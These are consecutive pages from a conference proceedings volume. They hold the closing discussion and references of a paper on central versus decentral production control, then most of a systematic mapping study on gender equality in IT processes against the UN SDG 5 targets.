Although this case study uses only a limited variation of factors like (1) parts number [#], (2) product variants, and (3) a rough structural configuration for the process control in the parameter space central-decentral, it seems preferable to make hence, in general, a dynamic allocation of production as a function of those factors used here to produce resource optimally.
306
3.5
B. Heiden et al.
Discussion
ad Axiom 1 According to Axiom 1 the system is decoupled by information and material processes. There can be a dynamic switching between information and material-limited processes. In this part, different production techniques come in. AM, as in the example, is limited with regard to the processing time. A central processing unit fixes this, and hence an information centered and limited material process. On the other hand, the possibility to produce in one automated process and quickly change the information set-up for personalization, which is the case due to the intrinsic cybernetic process, the complexity is hidden behind the fast computation, which allows for an efficient decentralization and hence also variation in product demand, which is another kind of decentralization process, here concerning the consumer demand, with dilated production demand by time dilatation, and is hence a time decentral process, versus the commonly meant room decentral process, also in this paper. Axiom 1 can serve as the modeling structure. Information and material processes are separated, and their interrelatedness can be sketched like with the arrows in Fig. 1. With regard to the Witness implementation, the simulation strategy is to construct a continuous material flow, which we have used here in the same manner for constructing the information flow as an understanding. ad Axiom 2 When we compare Table 1 and the simulation results in this work and that of Knabe, it can be concluded that number variation is only one parameter in a multivariate optimization problem for production. According to Axiom 2 this can be interpreted as the limiting bottleneck that increases when the system’s flexibility is increasing. The flexibility amount is dependent on parameters that increase complexity like personalization, distribution, decentral production and others. ad Axiom 3 With regard to Axiom 3 the optimum production can be different, both central and decentral, and the production parameters are (a) nonlinearly coupled, and there are (b) different levels of higher order combinations of central-decentral system interaction, or respectively multiversity of a combinatorial multi bi-variate parameter room of the category central and decentral (see also [9,11]). The results in the previous sections support this and lead to the recommendation to always optimize production case specific, e.g. with a production simulation process. ad Axiom 4 With regard to Axiom 4 it can be said that the necessary integration can be seen by means of the simulation, as here parameters can be varied, and by this, the optimal production scenario can be determined as a function of the actual production or producer state and consumer need. Especially with regard to optimal structures, it becomes apparent that we have static and dynamic variants for optimization, and each has different advantages. In any case, the dynamic reallocation of resources, which generally corresponds to the increasing need for flexibilization of production, seems to become more favorable concerning optimal results in more dense network configurations.
Central Decentral Meta-Order and Application Example
4
307
Conclusion and Outlook
In our study, we have first formulated four axioms that guide the parameterspace central-decentral concerning orgiton and general system theory. The first Axiom 1 is the basis how to model a production system with regard to material and information flows. The Axioms 2-4 describe general properties of production system operation. Axiom 2, the attractor theorem, states that there will be, in a given configuration, a quasi stationary state of operation. Axiom 3 then formulates a possibly switching of attractors under certain circumstances. Axiom 4 finally states possible optimal operation in diverse attractor environments, or multivariate dependent systems. The reason may be similar to that of Portfolio theory [21], due to nonlinear statistical system properties. Where in the Portfolio theory the “overall system” is the market, in our theory or axiomsystem here it is the multivariate production system. We then have approached a small step toward how an optimal production can take place under varying parameters of (1) parts number [#], (2) product variants and (3) the parameter space of dynamic process control in its discrete ends central-decentral, through an industrial production application example. In the following discussion, we have reasoned that the given axioms, defining the overall order structure of the presented research problem, are mirrored in the simulation results and the overall applicable production strategy. We have found that a real-time and case-specific simulation is a good way to screen optimal production possibilities case-specific. On reason for this is that (3) is a factor of overall fabric organization and that this is deeply connected to the structural arrangement of the fabric, which means the types of production devices and specific production process sequence organizations and their types of operations. Regarding systems theory, this affects autopoiesis, or the cybernetics of processes, the process of the process and the self-organization or the organization of the organization of structures or machines. Both specifics are peculiarities of Industry 4.0, and hence important for the future fabric. Finally, factors (1) and (2) depend deeply on society, production and human environment and product demand, or the personal dimension of the market, or the market of one person. This other end of the market diversification is termed with the important principle called personalization of production, which is also an essential part of Industry 4.0 and following further developed cybernetic future production paradigms. So in future, we focus on the following themes that colleagues are also invited to investigate as open questions: How can we shape or discover new patterns with further simulations of these types with regard to (a) general properties of specific productions schemes, which are gradually different in the parameter space central decentral? Another topic or open question is (b): What are, in any case, interesting influence parameters in the simulation process?, and (c), to mention only a few important: How will we transform production systems to self-organizational and even autopoietic systems? Last but not least (d) also the system theoretic debate whether optimization can be neglected if autopoiesis is
308
B. Heiden et al.
achieved (see here also [20, p. 172]) and which applications this has in production systems, will be of striking interest.
References 1. Bauernhansl, T., ten Hompel, M., Vogel-Heuser, B. (eds.): Industrie 4.0 in Produktion, Automatisierung und Logistik. Springer, Wiesbaden (2014). https://doi. org/10.1007/978-3-658-04682-8 2. Burkhard, H.: Industrial production manufacturing processes, measuring and testing technology, original in German: Industrielle Fertigung Fertigungsverfahren, Mess- und Pr¨ uftechnik. Haan-Gruiten: Verlag Europa-Lehrmittel, 6 edn. (2013) 3. Cavallo, C.: Die casting vs. sand casting - what’s the difference? Thomas-Company. https://www.thomasnet.com/articles/custom-manufacturing-fabricating/diecasting-vs-sand-casting/, 1 July 2022 4. Dasgupta, S., Papadimitriou, C., Vazirani, U.: Algorithms. The McGraw-Hill Companies (2008) 5. DCM. The time control of die casting process. Junying Metal Manufacturing Co., Limited. https://www.diecasting-mould.com/news/the-time-control-of-diecasting-process-diecasting-mould, 1 July 2022 6. Fadhlillah, M.M.: Pull system vs push system. http://famora.blogspot.com/2009/ 11/pull-system-vs-push-system.html, 1 July 2022 7. GE-Additive. http://famora.blogspot.com/2009/11/pull-system-vs-push-system. html, 1 July 2022 8. Gibson, I., Rosen, D., Stucker, B.: Additive Manufacturing Technologies. Springer, New York (2015). https://doi.org/10.1007/978-1-4939-2113-3 9. Heiden, B., Alieksieiev, V., Tonino-Heiden, B.: Selforganisational high efficient stable chaos patterns. In: Proceedings of the 6th International Conference on Internet of Things, Big Data and Security - Volume 1: IoTBDS, pp. 245–252. INSTICC, SciTePress (2021). https://doi.org/10.5220/0010465502450252 10. Heiden, B., Knabe, T., Alieksieiev, V., Tonino-Heiden, B.: Production orgitonization - some principles of the central/decentral dichotomy and a witness application example. In: Arai, K. (ed.) FICC 2022. vol. 439, pp. 517–529. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-98015-3 36 11. Heiden, B., Tonino-Heiden, B.: Lockstepping conditions of growth processes: some considerations towards their quantitative and qualitative nature from investigations of the logistic curve. In: Arai, K. (ed.) Intelligent Systems and Applications. IntelliSys 2022. Lecture Notes in Networks and Systems, vol. 543. Springer, Cham (2023). https://doi.org/10.1007/978-3-031-16078-3 48 12. Heiden, B., Tonino-Heiden, B.: Philosophical Studies - Special Orgiton Theory/Philosophische Untersuchungen - Spezielle Orgitontheorie (English and German Edition) (unpublished) (2022) 13. Heiden, B., Volk, M., Alieksieiev, V., Tonino-Heiden, B.: Framing artificial intelligence (AI) additive manufacturing (AM). Procedia Comput.Sci. 186, 387–394 (2021). https://doi.org/10.1016/j.procs.2021.04.161 14. Hilborn, R.C.: Chaos and Nonlinear Dynamics - An Introduction for Scientists and Engineers. Oxford University Press, New York (1994) 15. Huang, J., et al.: A hybrid electric vehicle motor cooling system–design, model, and control. EEE Trans. Veh. Technol. 68(5), 4467–4478 (2019)
Central Decentral Meta-Order and Application Example
309
16. Kampker, A.: Elektromobilproduktion. Springer, Heidelberg (2014). https://doi. org/10.1007/978-3-642-42022-1 17. Knabe, T.: Centralized vs. decentralized control of production systems (original in German: Zentrale vs. dezentrale Steuerungvon Produktionssystemen), bachelor’s thesis, Carinthia University of Applied Sciences, Austria (2021) 18. Krimm, R.: Comparison of central and decentral production control systems and simulation of an industrial use case, bachelor’s thesis, Carinthia University of Applied Sciences, Villach, Austria (2022) 19. Lanner. Technology witness horizon (2021) 20. Luhmann, N.: Einf¨ uhrung in die Systemtheorie, 3 edn.. Carl-Auer-Systeme Verlag (2006) 21. Markowitz, H.M.: Portfolio selection*. J. Financ. 7(1), 77–91 (1952) 22. Pan, Y., et al.: Taxonomies for reasoning about cyber-physical attacks in IoT-based manufacturing systems 4(3):45–54 (2017). https://doi.org/10.9781/ijimai.2017.437 23. Quitter, D.: Additive Fertigung: Geeignete Bauteile f¨ ur die additive Fertigung identifizieren 24. Quitter, D: Metall-3d-Druck: Spiralf¨ ormiger K¨ uhlkanal gibt e-Motorengeh¨ ause zus¨ atzliche Funktion (2019). https://www.konstruktionspraxis.vogel.de/ spiralfoermiger-kuehlkanal-gibt-e-motorengehaeuse-zusaetzliche-funktion-a806744/, 1 July 2022 25. Ruttkamp, E.: Philosophy of science: interfaces between logic and knowledge representation. South Afr. J. Philos. 25(4), 275–289 (2006) 26. Tonino-Heiden, B., Heiden, B., Alieksieiev, V.: artificial life: investigations about a universal osmotic paradigm (UOP). In: Arai, K. (ed.) Intelligent Computing. LNNS, vol. 285, pp. 595–605. Springer, Cham (2021). https://doi.org/10.1007/ 978-3-030-80129-8 42 27. Trentesaux, D.: Distributed control of production systems. Eng. Appl. Artif. Intell. 22(7), 971–978 (2009). https://doi.org/10.1016/j.engappai.2009.05.001 28. von Bertalanffy, L.: General System Theory. George Braziller, revised edition (2009) 29. von Foerster, H.: Cybernetics of epistemology. In: Understanding Understanding, pp. 229–246. Springer, New York (2003). https://doi.org/10.1007/0-387-21722-3 9 30. Watts, D., Strogatz, S.: Collective dynamics of ‘small-world’ networks. Nature 393, 440–442 (1998)
Gender Equality in Information Technology Processes: A Systematic Mapping Study J. David Patón-Romero1,2(B) , Sunniva Block1 , Claudia Ayala3 , and Letizia Jaccheri1 1 Norwegian University of Science and Technology (NTNU), Sem Sælands Vei 7, 7034
Trondheim, Norway [email protected], [email protected] 2 SimulaMet, Pilestredet 52, 0167 Oslo, Norway 3 Universitat Politècnica de Catalunya (UPC), Jordi Girona 29, 08034 Barcelona, Spain [email protected]
Abstract. Information Technology (IT) plays a key role in the world we live in. As such, its relation to the 17 Sustainable Development Goals (SDGs) stated by the United Nations to improve lives and health of the people and the planet is inexorable. In particular, the SDG 5 aims to enforce gender equality and states 9 Targets that drive the actions to achieve such goals. The lack of women within IT has been a concern for several years. In this context, the objective of this study is to get an overview of the state of the art on gender equality in IT processes. To do so, we conducted a Systematic Mapping Study to investigate the addressed targets, challenges, and potential best practices that have been put forward so far. The results we have obtained demonstrate the novelty of this field, as well as a set of opportunities and challenges that currently exist in this regard, such as the lack of best practices to address gender equality in IT processes and the need to develop proposals that solve this problem. All of this can be used as a starting point to identify open issues that help to promote research on this field and promote and enhance best practices towards a more socially sustainable basis for gender equality in and by IT. Keywords: Gender equality · Information Technology · Processes · Sustainability · Systematic Mapping Study
1 Introduction The United Nations (UN) proposed 17 Sustainable Development Goals (SDGs) for sustainable development, with the aim of making the world work together for peace and progress [1]. The Goals call out for environmental, social, and economic sustainability [2] to better the world; perspectives that can be seen in relation to Information Technology (IT). IT has revolutionized the world as we know in the past decades [3] within areas such as education, social interactions, and defence, among others. However, this revolution has been accompanied by negative aspects for the three perspectives of sustainability (environment, society, and economy) [2], which must be considered to achieve true © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 310–327, 2023. https://doi.org/10.1007/978-3-031-28073-3_22
Gender Equality in Information Technology Processes
311
sustainable development. An example of this is the marginal representation of women in IT research, practice, and education [4]. Numbers from 2019 show that just 16% of engineering roles are held by women and 27% of roles within computing [5]. While gender gaps have evened out in many fields and parts of the society in recent decades, it seems to lag in IT [6]. There are several questions that need to be addressed, such as why not more women enter IT, why women often leave IT, and what they specifically bring to IT. Studies show that women leave IT at a higher rate than men, and that of the already few women in tech, 50% of them will resign from their tech role before they turn 35 [7]. In the same way, for the past years, IT development has created different kinds of tools that help improve people’s lives and make it easier to communicate, among other relevant functions and characteristics. So, how does the lack of female input in development of IT solutions and, generally, in IT processes, affect the resulting application? This is a difficult question to answer and one that has not yet been adequately addressed. Albusays et al. [4] stated the following: “Although it is well accepted that software development is exclusionary, there is a lack of agreement about the underlying causes, the critical barriers faced by potential future developers, and the interventions and practices that may help”. For these reasons, the objective of this study is to understand the state of the art and how it corresponds to the Goal of gender equality (SDG 5 [1]) in IT processes, a topic that, until now, had not been explored or analyzed in previous works. By going through the current research and identifying the challenges and current best practices (through a Systematic Mapping Study) the prospect is to find out how IT processes can be improved and adapted to enhance gender equality. The rest of this study is organized as follows: Sect. 2 includes the background about gender equality and IT; Sect. 3 presents the methodology followed to conduct the analysis of the state of the art; Sect. 4 shows the results obtained; Sect. 5 discusses the main findings, as well as the limitations and implications; and Sect. 6 contains the conclusions reached. In the same way, Appendix A includes the list of references of the selected primary studies; and Appendix B shows a mapping of the answers to the research questions from each of these primary studies.
2 Background 2.1 Gender Equality The SDG 5 that the UN put forward in 2015 [1] targets gender equality. The UN recognize that progress between the SDGs is integrated, and that technology has an important role to play in achieving them. In the past decades progress in gender equality has been made, and there are today more women in leadership and political positions [8]. However, numbers from the UN show that there is still a long way to go; in agriculture women own only 13% of the land, and representation in politics is still low at 23.7%, even though it has increased1 . In developing countries genital mutilation and child marriage are some of the biggest threats affecting girls and women [9, 10]. The UN emphasizes 1 https://www.un.org/sustainabledevelopment/gender-equality/.
312
J. D. Patón-Romero et al.
that: “Ending all discrimination against women and girls is not only a basic human right, it is crucial for sustainable future; it is proven that empowering women and girls helps economic growth and development”2 . Gender equality is a complex goal with many dependencies that needs to be fulfilled. The main goal of gender equality is to make all discrimination against all women cease. This goal affects many different issues and types of discrimination and has a set of 9 Targets [1]. The Targets help articulate in more detail the different challenges from child mutilation to equal opportunities in political leaderships, among others, as can be seen in Table 1 (extracted from [1]). It is important to point out that in gender equality all genders should be included, and this no longer only contains men and women. However, this study will revolve around the gender equality dilemma that women face, as this is what is pointed out in the SDG’s and what is presented in the current literature analysis. Table 1. SDG 5 targets [1] Target
Description
Target 5.1
End all forms of discrimination against all women and girls everywhere
Target 5.2
Eliminate all forms of violence against all women and girls in the public and private spheres, including trafficking and sexual and other types of exploitation
Target 5.3
Eliminate all harmful practices, such as child, early and forced marriage and female genital mutilation
Target 5.4
Recognize and value unpaid care and domestic work through the provision of public services, infrastructure and social protection policies and the promotion of shared responsibility within the household and the family as nationally appropriate
Target 5.5
Ensure women’s full and effective participation and equal opportunities for leadership at all levels of decision-making in political, economic and public life
Target 5.6
Ensure universal access to sexual and reproductive health and reproductive rights as agreed in accordance with the Programme of Action of the International Conference on Population and Development and the Beijing Platform for Action and the outcome documents of their review conferences
Target 5.a
Undertake reforms to give women equal rights to economic resources, as well as access to ownership and control over land and other forms of property, financial services, inheritance and natural resources, in accordance with national laws
Target 5.b
Enhance the use of enabling technology, in particular information and communications technology, to promote the empowerment of women
Target 5.c
Adopt and strengthen sound policies and enforceable legislation for the promotion of gender equality and the empowerment of all women and girls at all levels
2 https://www.undp.org/sustainable-development-goals#gender-equality.
Gender Equality in Information Technology Processes
313
2.2 Gender Equality in IT From the Target 5.5 of the SDG 5, promoting more women within IT positions at all levels is presented, which can seem superficial in comparison to child mutilation, but having more women in these positions can help by putting more focus on the dangers girls face. As Diekman et al. state: “Lower numbers of women in STEM result in a narrower range of inquiry and progress in those fields; fields that have experienced increases in diversity also witness an increase in the range of topics pursued…” [11]. The lack of women within IT has made them high in demand for many employers, and it is interesting to get an understanding of why women are sought-after in the IT market [12]. There are examples of how companies with more women create better styles of management and are more creative and have innovative processes as well as more focus on better user experiences [13]. To increase women in IT many resources are in play, and some of the main enactments consist of university and mentoring programs [14]. These aim to create woman networks and get them to continue their degree, but it is also necessary to look further into why women leave IT and how this can be addressed. The lack of diversity within software development is well known but the barriers that future developers will face, as well as the practices that can help, are not thoroughly discussed and agreed upon [4]. One barrier that we are already seeing is that the lack of female input during the development of IT can lead to non-inclusive solutions [4]. A part of gender equality that can be perceived as conflicting for many is the drive for equality while still focusing on the differences such as in the missing female perspective in IT. It is important to note that even though the gender equality is achieved there will always be different perspectives that can only be obtained through the inclusion of all. It is for this reason that it becomes essential to include women (in addition to other discriminated social groups regardless of their race, culture, and other types of discrimination) and to achieve a balance throughout all processes that involve IT. When we talk about processes, ISACA (Information Systems Audit and Control Association) defines a process as a series of practices that are affected by procedures and policies, taking inputs from several sources and using these to generate outputs [15]. Further it is explained that processes also have a defined purpose, roles, and responsibilities, as well as a performance measure. In this study we understand IT processes as processes, frameworks, and/or best practices leading to the development of IT solutions.
3 Research Method The study will be conducted as a Systematic Mapping Study (SMS) and will follow the guidelines established by Kitchenham [16], adopting also the lessons learned for the data extraction and analysis identified by Brereton et al. [17]. 3.1 Research Questions Table 2 shows the research questions (RQs) established to address the objective of the SMS, as well as the motivation of each of them. As one of the prospects of the study is to see connections to the SDG 5, the RQ2 addresses this through the Targets of the SDG
314
J. D. Patón-Romero et al.
5. Further the statistics found and included above showed that many women leave IT, so this motivated RQ3 and RQ4, addressing what challenges are present in IT and the best practices for gender equality in IT processes. Table 2. Research questions Research question
Motivation
RQ1. What kind of studies exist on IT processes and gender equality?
Discover what studies exist on IT processes and gender equality and how they are distributed to get an overview of the field
RQ2. What gender equality Targets are addressed by IT processes?
Based on the Targets from the SDG 5, identify which targets are covered
RQ3. What are the main challenges to achieve gender equality in IT processes?
Identify the main challenges reported by existing studies in order to understand the obstacles that women in the IT sector face
RQ4. What are the best practices established to Uncover best practices that have been address gender equality in IT processes? reported to promote gender equality in IT processes
3.2 Search Strategy To define the keywords to be used to implement the searches, 3 main topics related to the research were identified: • The first topic refers to the field of technology. Concepts as IT, information technology, or information systems could be used, but it was concluded that technology itself represents the field well and covers the expected scope. • The second topic addresses processes and best practices, where both terms were implemented in the search string. • The third topic represents the gender equality, so terms in this regard were implemented in the search string. To address all the Targets from the SDG 5, it was decided to conduct specific searches that focused on each Target. As a result, 10 different searches were performed. Table 3 shows the search strings established for each one of these searches. 3.3 Selection Criteria In order to select the primary studies, a set of criteria were put forward to include all relevant studies and exclude those that would not aid the task. So, first, the criteria for including a study were established as follows:
Gender Equality in Information Technology Processes
315
Table 3. Search strings Scope
Search string
General
(Technology AND (Process* OR “Best practice*”) AND (Gender OR “Women rights” OR “Social sustainability” OR “SDG 5”))
Target 5.1
(Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND Discrimination))
Target 5.2
(Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (Violence OR Exploitation OR Trafficking)))
Target 5.3
(Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (“Harmful practices” OR Mutilation)))
Target 5.4
(Technology AND (Process* OR “Best practice*”) AND (“Social protection policies” OR “Care work” OR “Domestic work”))
Target 5.5
(Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (“Equal opportunities” OR Participation OR Leadership)))
Target 5.6
(Technology AND (Process* OR “Best practice*”) AND ((Sexual OR Reproductive) AND (Health OR Rights)))
Target 5.a
(Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND Rights AND Equal*))
Target 5.b
(Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND Empower*)
Target 5.c
(Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (Equal* OR Empower*) AND (Policies OR Legislation*)))
• I1. English studies published between 2016 (the year after the publication of the SDGs [1]) and 2021 about gender equality in and by the IT sector. • I2. Complete studies that are peer reviewed in journals or conferences. And, in the same way, the exclusion criteria defined were the following: • E1. Studies presenting opinions, or such as abstracts or presentations. • E2. Studies that do not revolve around IT processes and gender equality. • E3. Duplicated work, only the most recent will be considered. 3.4 Data Sources and Study Selection The selection of data sources and studies were performed through the following steps: • Data Source Selection. The searches were all performed with the bibliographic database Scopus, through the advanced search functions. • Initial Search. The initial search consisted of 10 search strings that resulted in a total of 4,206 studies. The study selection was performed by first reading through the titles and abstracts of all the studies and selecting according to the inclusion and exclusion criteria, which resulted in 50 potential studies.
316
J. D. Patón-Romero et al.
• Limiting the Studies. The 50 potential studies were further narrowed down by applying the selection criteria on the whole study. This resulted in 15 primary studies that were analyzed in detail and data extraction was performed. 3.5 Strategy for Data Extraction and Analysis Table 4 shows the classification scheme related to the possible answers identified during the planning for each of the RQs. In addition to the general information of each study (title, authors, venue…), this classification helps to identify and extract specific data such as the type of study, scope, practices and challenges in this regard, etc. Table 4. RQs classification scheme Research question
Answers
RQ1. What kind of studies exist on IT processes and gender equality?
a. State of the art c. Validation b. Proposal
d. Others
RQ2. What gender equality Targets are addressed by IT processes?
a. Target 5.1
d. Target 5.4 g. Target 5.a
b. Target 5.2
e. Target 5.5
h. Target 5.b
c. Target 5.3
f. Target 5.6
i. Target 5.c
RQ3. What are the main challenges to achieve gender equality in IT processes?
Keyword extraction to identify answers (due to the large scope of answers that this RQ can have)
RQ4. What are the best practices established Keyword extraction to identify answers (due to to address gender equality in IT processes? the large scope of answers that this RQ can have) * The answers to RQ1 have their origin in an adaptation from the example of Petersen et al. [18].
4 Results 4.1 RQ1: What Kind of Studies Exist on IT Processes and Gender Equality? The RQ1 is set to discover what studies exist in the field of IT processes and gender equality. Following the extraction plan visualized in Fig. 1, we find that out of the 15 primary studies there are five state of the art analysis ([S06], [S07], [S10], [S12], and [S15]), one proposal ([S05]), four validations ([S04], [S08], [S09], and [S13]), and five categorized as others ([S01], [S02], [S03], [S11], and [S14]). All results were limited to the last six years, which is a short publication period whose purpose is to have a quick overview and a first approach to the most recent and updated works. It is worth mentioning that seven of the studies were published from 2020–2021, three in 2019, and the resulting five from 2016–2018, indicating a growing interest in the area.
Gender Equality in Information Technology Processes
317
Fig. 1. Results from data extraction of RQ1 (Percentage of the Kind of Studies)
4.2 RQ2: What Gender Equality Targets are addressed by IT Processes? All the primary studies have been assessed for which of the 9 Targets from the SDG 5 [1] they contribute to. The results obtained in this regard (and represented in the Fig. 2) show that all of the 15 studies foster Target 5.5 that is concerned with ensuring women’s participation and opportunities at all levels in public life. Further 10 out of the 15 primary studies ([S01], [S02], [S04], [S05], [S06], [S11], [S12], [S13], [S14], and [S15]) condition Target 5.1 that is related to end all forms of discrimination. A third of the studies ([S04], [S05], [S06], [S10], and [S13]) address Target 5.4 that applies to promoting equality and shared responsibility within household and domestic care. A third of the studies again ([S04], [S05], [S06], [S08], and [S10]) contribute to Target
Fig. 2. Results from data extraction of RQ2 (Number of Studies Addressing each of the Targets within the SDG 5)
318
J. D. Patón-Romero et al.
5.c concerning policies for promoting empowerment of women and gender equality. Finally, Target 5.b is also hit by one study ([S08]), regarding using enabling technology to promote the empowerment of women. It is equally important to highlight the Targets that were not address by any study, which are Targets 5.2, 5.3, 5.6, and 5.a. 4.3 RQ3: What are the Main Challenges to Achieve Gender Equality in IT Processes? With the aim of discovering the current challenges on gender equality in IT processes, a keyword extraction was performed, identifying those concepts in this regard that each study deals with. Figure 3 shows an overview of all the challenges that have been identified in two or more studies. In the same way, it is important to remember that the mapping of the full data extraction results can be found in Appendix B. First, the challenge that is most frequently mentioned is gender bias, appearing in 8 studies ([S02], [S03], [S04], [S05], [S06], [S07], [S08], and [S14]). To better understand what this challenge refers to, the APA Dictionary of Psychology describes gender bias as “any one of a variety of stereotypical beliefs about individuals on the basis of their sex, particularly as related to the differential treatment of females and males” [19]. Therefore, this challenge refers to preconceptions without evidence of the involvement, performance, responsibilities, and possibilities, among others, of women in IT processes. Second, imposter syndrome is the next challenge that occurred with most frequently in seven studies ([S02], [S04], [S08], [S09], [S11], [S12], and [S13]). Embedded in the term imposter syndrome is the fear of being revealed as a fraud or seen as incompetent for one’s job. Di Tullio [S13] states that we often become what we think others expect of us, and in this case imposter syndrome can lead to increased insecurity and the belief that others also believe that one is a fraud. And, third, with four occurrences ([S01], [S07], [S13], and [S15]), implicit bias refers as the result of internalized bias that one is unaware of posing and is generally understood as people acting on stereotypes or prejudice without intention. Implicit bias is often gender bias, but due to the people unawareness it leads to other challenges than just gender bias. Other challenges mentioned are the stereotype threat, pay gap, motherhood penalty, gender preferences, and retention problems. Stereotype threat concerns the fear of failing and thereby confirming a negative stereotype, which can lead to a decrease in career interest [S08] [S10]. The pay gap between genders is not just a problem, but also a direct indication of the value employees of different genders has in a company [S06] [S07] [S12]. Challenges about motherhood penalty are many, and one example is the perception that parenthood builds men’s commitment, but reduces women’s commitment [S04] [S11] [S12]. Some studies also present gender preferences, referring to the fact that women often choose occupations that are seen as “softer”, which is also a factor within IT where women often choose “softer” roles [S06] [S10]. Likewise, some challenges are only mentioned once, such as code acceptance, disengagement, few women, poor management, symbolic violence, queen bee syndrome, gender-based discrimination, self-efficacy, stereotype bias, and negative environment.
Gender Equality in Information Technology Processes
319
Fig. 3. Results from data extraction of RQ3 (Number of Studies Dealing with the Challenges to Achieve Gender Equality in IT Processes)
4.4 RQ4: What are the Best Practices Established to Address Gender Equality in IT Processes? For the RQ4, the data extraction model was based on keyword extraction identifying the best practices to address gender equality in IT processes. Of all the selected primary studies, five of them provide best practices or frameworks that tackle the challenges presented in the previous subsections, but none of them were specifically for IT processes. However, despite not being specific best practices for IT, their characteristics and points of view allow them to be easily adapted and made applicable to the IT context. So, the best practices found in these five primary studies are presented below. First, study [S04] presents the importance of women having their own safe place to discuss challenges and support each other through women only workshops or other arenas (online forums, offline networks…), where the main point is that women feel free to talk openly. This can keep more women in tech and combat retention problems. Second, study [S05] presents “nudging” as a way to encourage gender equality by establishing its importance without setting hard demands. Nudge theory can be established on different levels, where the main point is nudging behavior in a direction to remove negative biases in a predictable way without changing policies or mandates. This practice can address several challenges; for example, an organization could ask all contractors to provide a pay equity report, nudging them to diminish the pay gap, or ask for the percentage of women leaders, to establish a gender balance criterion in tenders. Third, study [S06] presents the habit-breaking approach to reduce bias, which applies to both gender bias and implicit bias. The first step towards breaking a bias is being made aware of it and the consequences it has. The second step consists of using strategies that are set to address the bias, this can be done through, for example. Perspective-taking, individualization, or counter-stereotype exposure. Fourth, study [S08] puts forward the goal congruity model as a way of understanding how people often follow gender roles. The model suggests that women often chose not
320
J. D. Patón-Romero et al.
to go into IT because it goes against the communal goals society has set for women. However, this model implies that by changing the social expectations for women, they can feel more valued in their IT role or motivated to pursue a career in this field. Finally, study [S10] promotes anti-bias and gender-blind training to create more tolerance and awareness for diversity in the workplace, helping people to work more smoothly together. Although in this case this is applied to the field of gender equality, it should be highlighted that it is a method applicable to any type of discrimination.
5 Discussion 5.1 Principal Findings Lack of Studies on IT Processes and Gender Equality. The primary studies selected cover a diverse field of studies in psychology, neuroscience, business, sociology, and technology. Since the field of gender equality and IT is an intersection between several fields, this also generates a great variation in the studies analyzed. This diversity and interdisciplinarity are undoubtedly a very positive aspect and help to obtain better results in the developments and research performed. However, due to the large number of studies found (4,206 in total), we expected to have obtained more relevant studies and not just the 15 primary studies. This shows that, although the concepts of IT and gender equality are very common and have already been analyzed before [20, 21], the direct intersection of IT processes and gender equality is an innovative and novel field that should be investigated in more detail. Low Number of Proposals and Validations. There is only one study classified as a proposal, which presents new research ideas that have not yet been implemented. In addition, there are four studies that validate their approach using a gold standard measure and are thereby assessed as a validation study following the definition of Fox et al. [22]. These results not only demonstrate the novelty of the research area of gender equality and IT processes, but also the need to develop new and updated proposals to address gender equality in and by IT processes. Likewise, it is equally important to properly validate the proposals to really verify their effectiveness and efficiency in real contexts, creating high-quality research in these fields. Right Approach towards the Targets of the SDG 5. We can observe that some of the Targets are not addressed by any study, such as the Targets 5.2 and 5.3, concerning exploitation, harmful practices, and mutilation [1]. These Targets are very important, but they have little and indirect relationship with IT processes, being considered outside the scope in this regard. However, although the approach of addressing at a first level the most fundamental Targets and that are directly related to IT processes is correct, it is important to also address these secondary Targets. For example, within IT processes, a series of practices can be established aimed at the specific development of IT proposals that address problems such as exploitation, harmful practices, and mutilation. Focusing on the Targets that the studies complied with, we can observe several findings. First, Target 5.5, about improving women’s participation and opportunities in all levels of public life, is addressed by all the primary studies and seems to be very
Gender Equality in Information Technology Processes
321
coherent with the RQs focus of achieving gender equality in IT processes. Many of the studies emphasize that women have the skills and qualities required for IT jobs. For example, the study [S03] tests how a development team’s risk-taking is affected by having more, fewer, or no women, and found no significant differences. Another example is the study [S08], which suggests that many women assess themselves as having lower abilities than men, even in situations where they are externally assessed as performing better than men. This can be seen in connection to those women who often only apply for a job if they feel fully qualified as stated by the study [S07]. Second, Target 5.1 is to end all discrimination against women, and this is also presented as one of the most addressed Targets. The studies contribute through creating awareness about challenges women face and providing statistics to highlight the inequality. For example, the study [S06] highlights the pay gap that women experience. Third, Target 5.c is concerned with enforcing policies for the promotion of gender equality. It is very easy to see and understand the direct connection between this Target and IT processes, especially when it comes to implementing best practices that address gender equality. And this is demonstrated, since the 5 primary studies that deal with this Target ([S04], [S05], [S06], [S08], and [S10]) are the only ones that identify and establish a series of best practices in this regard. Finally, Target 5.4 prompts the importance of valuing domestic work and promote shared responsibility within the household. The study [S06] portrays how motherhood is seen as lessening a woman’s commitment to work, which can be seen both as a stereotype but also a real outcome in households where women are expected to stand for most of the childcare and additional household duties that come with an expanded family. The view of mothers as less committed can result in being passed over for promotions as well as salary increases in the workplace. Thus, it is necessary to understand that this is not the case and measures must be taken to raise awareness and put an end to these preconceived and erroneous ideas. Importance of Tackling all Challenges Together. The challenges found through the primary studies affect human relational behaviors such as bias and other challenges related to women’s self-efficacy as imposter syndrome and stereotype threat. However, most of the challenges apply more to the organizations and society as a whole, such as pay gap, retention problems, and challenges related to motherhood. The challenges that affect how women are treated are often because of bias. Study [S01] states that most people agree that standards for excellence should be the same for all, but that it is difficult to achieve in practice due to gender bias. Some challenges are also mainly affecting women’s self-efficacy. An example is the stereotype threat, where the fear is of confirming the negative stereotypes of one’s group, as identified by the study [S07]. This same study further explains that stereotype threat can affect motivation and interest in career, maybe one of the reasons why some women choose to leave the IT field. Likewise, an argument made by the study [S14] is that women should allow more external attributions for their setbacks, indicating that this can make them feel like they are in the right place even in an opposing environment. Several of the challenges presented are complex and need to be addressed in organizations and society. One of the biggest and most complex challenges is the motherhood
322
J. D. Patón-Romero et al.
